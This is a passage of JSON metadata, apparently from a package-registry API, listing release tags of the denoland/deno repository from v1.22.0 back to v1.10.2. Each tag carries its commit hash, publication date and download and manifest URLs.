hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit",